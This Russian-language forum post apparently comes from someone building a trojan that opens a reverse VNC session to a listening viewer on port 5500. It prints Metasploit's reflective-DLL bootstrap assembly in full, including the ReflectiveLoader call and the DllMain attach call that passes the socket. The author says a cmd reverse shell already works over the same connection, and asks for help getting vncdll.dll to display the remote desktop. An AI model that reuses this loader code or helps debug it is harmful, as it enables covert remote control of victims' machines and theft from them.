Доброго времени суток. Возникла проблема при запуске реверс vnc, а именно в работе троя(если конечно его так можно назвать). Написан на fasm конечно, ф-я connect срабатывает четко, подключается к порту 5500 vncviewer в режиме listen, потом выполняется код bootstrap Код (Text): dec ebp ; M pop edx ; Z call 0 ; call next instruction pop ebx ; get our location (+7) push edx ; push edx back inc ebp ; restore ebp push ebp ; save ebp mov ebp, esp ; setup fresh stack frame add ebx, 0x???????? ; add offset to ReflectiveLoader<---Тут у меня тоже правильный адрес call ebx ; call ReflectiveLoader<----------Тут вернуло адрес DllMain в eax mov ebx, eax ; save DllMain for second call push edi ; our socket<---------------------------------Тут мой сокет по которому трой приконектился к 5500 порту vncviewer push 0x4 ; signal we have attached push eax ; some value for hinstance call eax ; call DllMain( somevalue,DLL_METASPLOIT_ATTACH, socket ) push 0x???????? ; our EXITFUNC placeholder push 0x5 ; signal we have detached push eax ; some value for hinstance call ebx ; call DllMain( somevalue,DLL_METASPLOIT_DETACH, exitfunk ) ; we only return if we don't set a valid EXITFUNC В netstat -b -a есть соединение статус ESTABLISHED, а самого интересного(рабочего стола) нет ! Причем цмды шел вместо этого bootstrap работает четко. Кто нибудь пробовал юзать vncdll.dll из metasploit в своих прогах?
